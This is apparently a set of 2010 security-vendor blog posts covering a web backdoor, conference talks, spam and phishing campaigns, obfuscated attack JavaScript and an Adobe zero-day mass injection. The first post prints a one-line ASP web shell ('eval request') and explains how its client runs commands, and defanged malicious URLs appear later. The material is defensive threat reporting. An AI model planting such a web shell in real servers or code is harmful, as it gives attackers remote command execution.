Websense Security Labs™ ThreatSeeker™ Network has detected a backdoor written by a Chinese hacker spreading in the wild.  In this blog we shall explore what actions are possible with such a backdoor.

The controller client of the backdoor can explore and modify all files on a compromised server:

Also, hackers can use a client to run commands on the compromised server:

With the powerful client side, the server side only needs a few code lines written in ASP or PHP, so it can easily be injected into a Web page by SQL injection or other hack technology.  The source code of the server side looks like this:

<%eval request("hack")%>

By capturing the network traffic packages, we can see what the backdoor did. Here is an example:

The client side generates an encoded command string as a post request to the server. The string is:

After decoding this, we can see how to run a command on the compromised server:

The parameter z1 is "cmd", which opens a command line on the server side, and the parameter z2 is:

Following the request, the server response is to list all files in the current folder:

The above shows the running of a "dir" command on a compromised server. Hackers can run almost all commands on a server from the client side by using this method.

Websense Messaging and Websense Web Security customers are protected against these attacks.

Last week, Ulysses and Hermes attended the SyScan'10 Singapore conference, where 17 speakers presented 14 different topics, including software and hardware security.

The many interesting topics at this conference included integrity checking of Microsoft Office documents, Chrome sandboxing, Office vulnerabilities, PHP exploits, and mobile phone attacks.

Our presentation described the threat trend of SWF and PDF applications and how various kinds of attacks rely on vulnerabilities in Web browsers to spread threats on the Internet.  We showed how antivirus solutions work and how hackers change the content in malicious files to bypass them. We also demonstrated several ways to fight against the technology of embedded malicious content in SWF/PDF files and resolve the issue of content stripping for end users.

Thanks to the organizers for a great conference in a great place!

You can download our presentation here.

I was at EUSecwest 2010 last week, to give a talk about binary diffing technology and my tool DarunGrim. The conference went from June 16^th to June 17^th. We had a fun time sharing our ideas and findings. Here are brief descriptions of the talks that I attended.

Rainbow Tables Reimplemented

Sebastian "naxxatoe" Graf

This talk was about reimplementing traditional rainbow tables in a more efficient way.The speaker has some source code and a table itself to release in the near future.

Having fun with Apple's IOKit

Ilja Van Sprundel, IOActive

The speaker presented some preliminary research on the IOKit from the perspective of the security researcher. It seems as if no one else has investigated this issue thoroughly, and it could be the next gold mine.

Auditing C#

Vincent Berg, IOActive

This talk offered both basic and advanced material on auditing the code written in C#. C# is regarded as a generally secure language, but still there are many ways in which it can fail.

Escaping the Sandbox

Stephen Ridley, Matasano

This speaker described many types of sandboxes currently in use on Windows systems. He showed real examples and used debugger output to demonstrate various options that modern sandboxes are capable of providing. He also released a sandbox analysis toolkit called SandKit, which is available here.

DarunGrim - A Tool for Binary Diffing and Automatic Vulnerabilities Pattern Matching

Jeongwook (Matt) Oh

This was actually my presentation. I presented the technology of binary diffing.  And, I proposed a new concept of smart binary diffing. I built a system for binary management and introduced a new index value called "security implication score".  This score tells you which modification has more security implications. The package that contains all of these improvements will be released in a few weeks. The presentation material is available here.

Fighting PDF Malware with ExeFilter

Philipe Lagadec, NATO/NC3A

PDF is a hot issue these days. And here's the tool to sanitize all your suspicious PDF files before you open them. This is a great open source project to implement a PDF normalizer that will remove any suspicious objects from the PDF files. The package is available from here.

Defending the Poor - Flash Defense

Joern Bratzkei, Recurity Labs

This presentation was about a project funded by the German government. The project page is here. The cool thing is that this is an open source project. The main functionality is normalization through recreation. It actually understands flash AVM code and rewrites it to be normalized and to be harmless. The only pitfall I'm seeing is that this currently supports only AVM1 code.

Hacking Oracle from Web Apps

Sumit Siddharth, 7Safe

Unfortunately, I was not able to attend all of this presentation. But the demonstration was cool.  Using SQL injection, you can basically execute any commands you want on the server.

Location Aware DoS Attacks (how proposed IETF drafts can change the future of DoS)

Keith Myers & Jose Avila, ONZRA

This talk was about abusing EDNS to circumvent location-based DNS reponses. This technique will open a way to find the actual target the attacker is interested in, for DOS attacks.

Milking a horse or executing remote code in modern Java Web frameworks

Meder Kydryraliev, Google

The speaker presented a unique way to own a Java Web framework. By overwriting some internal variables using the Spring Web Framework vulnerability, he could own the Web server and could execute any command he wanted, using the bug. The related vulnerability is published here.

Legic Prime: Obscurity in Depth

Karsten Nohl & Hendryk Plötz, Security Research Labs

This talk was about breaking an RFID smart card called Legic Prime. This card was introduced more than a decade ago and has been known to be very safe against duplication or forgery. But two brilliant researchers cracked the underlying obfuscation logic and could duplicate or make any kind of card they wanted.

Hacking Printers for fun and profit

Andrei Costin

This talk was about owning printers. Printers could be a critical attack point in the future. There are many potential ways that they can be backdoored and used for collecting valuable information. Even more serious is that nobody seems to be paying attention to protecting printers, even though they can be easily misused. The full presentation file is here.

Immature Femtocells

Ravishankar Borgaonkar & Kevin Redon, Technical University of Berlin

This talk was about exploiting a femtocell device. I had never heard about femotcell before. Basically it's a personal cell tower. You just connect it through broadband, and it will pass through all your cell phone and data traffic. In case you're out of coverage from your cell phone service provider, you can use this device to enable your cell phone to work through Internet connection. The device is supposed to be heavily protected. What the speakers accomplished was jailbreaking and rooting the device. And the device itself tries to gather location information from various sources like IP address and GPS signal. But they could all be circumvented like by using $12 GPS jammer and VPN connection to home network. Basically with the methods they presented, you can use your cellphone anywhere in the world without additional charges. They included some live demos. U.S. wireless service providers have similar devices, and this is a problem that we all need to pay more attention to.

That's it. This conference was unique, and a great experience for me. All subjects gave me something to think about. Thanks to @dragosr and the SecWest staff for inviting me to this great conference.

My next talk will be at Blackhat USA 2010 and Defcon 18, so if you're interested in binary diffing or locating vulnerabilities using static analysis, my talk may help you a lot. The title is "ExploitSpotting: Locating Vulnerabilities Out Of Vendor Patches Automatically".

See you there.

With the official launch of Apple's iPhone 4 today people are queing outside stores to get hold of the latest smart phone.

Spammers do not miss an opportunity to jump on the hype around new product launches - especially in the case of the iPhone 4 when all 600,000 pre-orders have been allocated prior to the official launch date.  Our ThreatSeeker Network has identified iPhone 4 themed spam and Facebook wall posts. Should the users be tempted by the offer of a free iPhone 4, they are presented with affiliate campaigns to harvest email addresses to push further products on the user.

We were seeing Facebook posts that entice users with the possibility of receiving a free iPhone 4 as shown below.

Facebook post:

Upon clicking on the url within the Facebook post, the user then progresses through a series of data collection systems (requests for email address and full postal address) enticing users with offers of a free iPhone 4.

Within our Hosted Email Security service we are also seeing spam campaigns jumping on the iPhone 4 theme.  The example below, of which we have seen over 300,000 instances, leads to a Russian domain pushing a pharmacy website.

A second example offering a free iPhone.

More information on the queues outside stores here.

Websense Messaging and Websense Web Security customers are protected against these attacks.

Websense Security Labs™ ThreatSeeker™ Network has detected a malicious spam outbreak with the Subject line "Account Verification". As of June 22, we have counted more than 100,000 of these messages. The attack message is disguised as coming from Digg.com. It asks the recipient to verify their Digg.com account. Clicking the "Password  change" link in the email body redirects the user to malicious websites (see the screenshot below).

Malicous email body screenshot :

The malicious payload :

There are two malicious links in the payload. The first link redirects the user to a site that prompts the user to download a Trojan file (29% detection). The second link (in an iframe) redirects the user to a site laden with exploits.

Websense Messaging and Websense Web Security customers are protected against these attacks.

Websense Security Labs™ ThreatSeeker™ Network has discovered that the popular site dreamtemplate.com has been compromised. Websense customers are protected from this threat.

The site has been injected with an Iframe that leads to a one day old site. The file dropped by the exploit has only 10% detection rate.

Screenshot of the infected Website:

\

Screenshot of the injection:

Major Hits

A few Web sites belonging to the U.S. Department of the Treasury were compromised and injected with a malicious iframe which loaded exploit code to visitors (video included). Yet another large scale attack targeting Wordpress installs occurred, leading visitors to rogue AV sites, pharmaceutical spam, Zeus C&C sites, and other shoddy Web sites. PHP-Nuke, a popular PHP-based CMS, had its Web site compromised and injected with a malicious iframe. In case it isn't yet obvious, breaking in to legitimate popular Web sites and then inserting an iframe that loads up exploits is a popular thing among blackhat hackers these days.

In the UK, search terms relating to the UK General Election were poisoned (blackhat SEO), and unsuspecting Web users clicking on the wrong results in Google would find themselves on fake antivirus Web sites.

Across the pond in the east, the world's #1 country with the largest number of Web users (that's China) saw at least 2 major infections. The first compromise was Chinaz.com, a famous Web site for Web masters. The second compromise was one of the latest and most influential forums in the country: the game channel of MOP BBS. In both cases, these sites were infecting their own visitors. This appears to be the primary motivation for blackhat hackers to break into popular sites - so that they get the opportunity to infect the site's regular visitors.

Web 2 dot uh oh

This month was a banner month of Facebook "oops". First, a flaw in the site exposed live chat sessions and other private user information (video). Then there was an onslaught of malicious links spreading virally within Facebook's platform using social engineering tactics that many Facebook users fall for, unknowingly exposing their own Facebook friends to malicious links.

• "Sexiest Video Ever"
• "Distracting Beach Babes" (our technical analysis here).
• "Most Hilarious Video"

In all of these cases, the app tricks the user into downloading a malicious .exe file disguised as a "Flash" or "FLV" player. You may also opt to install our security application for Facebook, the world's first and only real-time security app that protects your wall from such unwanted messages. It's available for free at http://defensio.com

In other news, Dasient reports that 1.3 million malicious ads (malvertising) are viewed each day, with 59% of those resulting in a drive-by download, followed by 41% resulting in fake security software (rogue AV / scareware).

Browser and Friends

A new security update for Shockwave Player is available; 18 critical vulnerabilities has been patched. Adobe categorized this as a critical update and strongly recommended to install it. And from Brad Arkin, Adobe's Director of Product Security and Privacy, Adobe has considered reducing the update cycles for Adobe Reader from 90 to 30 days to reduce the pressure from customers who have already suffered a lot due to the security vulnerabilities. Flash and Shockwave may also be brought into this update cycle.

A zero-day vulnerability in the Safari browser has been discovered: the vulnerability may lead to the exposure of sensitive information or even execute arbitrary code. A POC (.rar) has been published here.

Opera Software has released Opera 10; an "extremely severe" security vulnerability that may lead to remote code execution attacks has been patched.

In October 2009, Mozilla pushed the "Plugin Check" project live, which can check the update information of plugins in Firefox and help customers to update. This was a very good idea as old versions of plugins are a major security hole nowadays. Now, Mozilla has made a great effort and extended the service to other browsers: Safari, Chrome and Opera are now fully supported, and IE has limited support.

If you're used to just clicking through Java warnings on Web sites that say "This application's signature cannot be verified. Do you want to run this application?", you might want to think twice. We picked up a trend of malicious Java applets that download a malicious .exe file - which is then executed on your desktop.

Microsoft

May's Patch Tuesday included two remote code execution vulnerabilities, one in their mail clients and the other in Visual Basic. Patch MS10-030 was for vulnerability CVE-2010-0816, an integer overflow bug in Outlook Express and Windows Mail that can lead to remote code execution. Patch MS10-031 was for vulnerability CVE-2010-0815, covering a stack memory corruption problem with the parsing code for ActiveX handling.

The SharePoint XSS bug we mentioned last month hasn't been patched yet.

Microsoft also announced an unpatched vulnerability (CVE-2009-3678) in the Canonical Display Driver (CDD) in 64-bit Windows 2008 R2 and Windows 7 using the Aero theme. While remote code execution is possible, Microsoft considers denial-of-service attacks more realistic. While their advisory is still available, Microsoft appears to have retracted their MSRC/SRD blog post about the vulnerability.

Hello ThreatSeeker. You've got mail!

Malicious social engineering just doesn't seem to go away and looks like it won't any time soon! This month has been a testament to that with all the different tricks being used. We saw lures involving Facebook, iTunes, Amazon, Adobe, and even job applications.

Early in the month, we reported on a campaign of malicious emails which enticed users into installing a backdoor. The fruit of temptation was a Facebook toolbar which was spread via a link in the email; the link even led to a file named toolbar.exe. We also reported on a campaign of malicious attachment spam which claimed to be iTunes gift certificates. There were also messages from supposed job hunters which were sent out in a large email campaign. The unfortunate victims of this job hunter spam campaign were met with a rogue AV installation. Last, but of course not least, we saw the ever-present threat, Zeus, sending out a clever new campaign of emails. This campaign took great care in tricking victims into downloading malware. These Zeus messages contained a PDF attachment as well as a link to a malicious executable file in the email message. To make the messages more believable, they were made to look like forwarded mail from a security director within your company which explained that Adobe Reader needed to be updated.

Security Trends

Symantec’s recently report (.PDF) said the Zeus crimeware kit and the growth of malicious PDFs based on the integration of Adobe flaws in popular malware kits make it easier for unskilled attackers to compromise computers and steal information.The effectiveness of an up-to-date antivirus against Zeus is just 23%. On the other hand, PDF attacks accounted for 49% of Web-based attacks for 2009.

Researchers from VeriSign’s iDefense Intelligence Operations Team conclude that the average price of the underground marketplace for renting a botnet is $67 for 24 hours, and $9 for hourly access. The low price of their services were due to a simple fact - based on the increasing supply of malware infected hosts.

According to the paper (.PDF) published by Electronic Frontier Foundation (EFF), it is possible for Web sites to track users around using the unique fingerprint.

Modularization of malware makes it more difficult for the AV vendors to collect all samples of various modules as the attackers can target them.

This month's contributors:

• Ulysses Wang
• Lei Li
• Erik Buchanan
• Chris Astacio
• Jay Liew

Websense® Security Labs™ ThreatSeeker™ Network has detected an interesting correlation between recent rounds of malicious emails and the JavaScript files being used in mass injections.  First, let's think about recent malicious email campaigns.  If you review our recent blog posts about fake virus alerts and world cup-related malicious spam, you will see that the common theme in the two campaigns is that they contain heavily obfuscated scripts in the HTML attachments.  In fact, we've seen from our bot lab that Zeus variants seem to be responsible for these messages, as well as a number of other messages with different subjects and themes that have malicious HTML attachments.  The script from one of the email variants seemed oddly familiar.

Screenshot of one of the attached malicious HTML files:

Our ThreatSeeker™ Network puts us in the unique position of being able to scan emails and malicious Web sites to gain insights like these.  Follow up on another reported mass injection campaign revealed a similarity that shouldn't be ignored between the injected .js files on compromised sites and the email attachments.

Screenshot of a malicious JavaScript file used in the injection attacks:

In fact, after deobfuscating these by hand, we found that the two files use the same algorithm to deobfuscate their hidden contents.  These files fragment an obfuscated script amongst a number of variables in the file and concatenate them to get one long, obfuscated string.  This string then goes through a series of .replace functions to turn it into an escaped string.  Once the string is unescaped, the resulting character codes are obtained and used in an XOR operation.  The resulting string of numbers from this XOR are then decoded as character codes to obtain the final, clear HTML attack code.

Step 1:  Concatenate several variables to obtain one long, obfuscated string.

Step 2:  Decipher the above string with a number of .replace actions to get an escaped string.

Step 3:  Escape the above string to get a listing of seemingly random characters.

Step 4:  Obtain the character codes for each character in the above string.

Step5:  XOR the above character codes to get another string of character codes.

The final step is obtaining the characters that the above codes represent.  Below are the screen shots of the final and clear script code generated from deobufuscating the email attachment and the .js files which are inserted into compromised hosts.

Screenshot of the deobfuscated email attachments:

Screenshot of the deobfuscated JavaScript attack file:

Now, if we follow the HTTP transactions from visiting one of the injected sites, we really begin to see that these appear to be structured as the same attack, possibly coming from the same group.  Following one example, we can see that after the browser does a GET for the injected Java Script file, there are two more GETs for redirection proxies, until finally we land on the attack site at /index.php?pid=7.  From there, we have two other GET requests for /Applet7.html and /Notes7.pdf.  If you review the video we posted from the malicious virus alert emails, you will find that the flow for that attack was the same, except for the redirection proxies.

Screenshot of the HTTP flow after visiting an injected site:

Websense Messaging and Websense Web Security customers are protected against these attacks.

Unfortunately it was only a matter of time. Until today the latest Adobe 0-day vulnerability (CVE-2010-1297) had only been used in targeted attacks. That changed a few hours ago when we started seeing mass injections adding the following URL to thousands of pages around the world:

hxxp://26[REMOVED].in/y[REMOVED]o.js

As in the targeted attack scenario we blogged about two days ago our customers are protected by our Websense ACE technology whereas the AV community still has not caught up. The attack itself uses five different files:

y[REMOVED]o.js - the initial file that loads up an invisible iframe to i[REMOVED].html, detection 0/41 (0.00%). Also loads a statistics file that is not malicious.

i[REMOVED].html - loads l[REMOVED]g.txt and a[REMOVED]ey.swf to launch the exploit, detection 3/40 (7.50%)

l[REMOVED]g.txt - contains the shellcode needed for the exploit to work, detection 0/40 (0.00%)

a[REMOVED]ey.swf - contains a Flash file with the exploit, detection 2/41 (4.88%)

l[REMOVED]g.exe - the actual malware that is downloaded, detection 24/41 (58.53%)

The attack is closely related to the hxxp://ww.robint.us/[REMOVED].js attack earlier this week that our friends at Sucuri blogged about, where the common theme was that all Web sites were running on Microsoft IIS and used ASP.NET. In fact, the majority of sites compromised by the new mass injection attack still have the robint.us code present. Below is a video of how the attack works and what happens on a user's computer.

Adobe released a patch for this vulnerability yesterday and we advise all users to download it immediately. Remember, if you use both Internet Explorer and another browser you have to do this twice. Once for IE and a second time for all other browsers.

Websense® Security Labs™ ThreatSeeker™ Network has detected a new wave of interesting malicious emails.  At the dawn of the eagerly anticipated World Cup tournament, we would expect to be inundated with suitably themed spam.  The sample we have encountered today is a little different from the usual, as the technique used may not raise suspicion.  We have seen over 80,000 email messages in this new campaign, which uses an HTML attachment with an embedded JavaScript.  Upon execution, this script leads to a malicious Web site, from which we are protecting our customers with our real-time analytics in our ACE engine.

You will remember that this same technique of using JavaScript to link to a malicious Web site was used in a different spam campaign only yesterday.

Below is a screen shot of the email message as seen by an unsuspecting user:

Analyzing the attached file, we notice the following obfuscated script:

Beautified results: We can identify the use of substitution to derive the relevant URL.  The "replace" section of the script performs a simple substitution to generate the domain name.  

Below we have the de-obfuscated URL:

hxxp://www.advanced[removed].com/xnu4ej/z.htm

Following are the results of URL analysis within our tracker. As you can see, we have numerous live real-time analytics protecting against this type of threat and its derivatives:

Websense Messaging and Websense Web Security customers are protected against these attacks.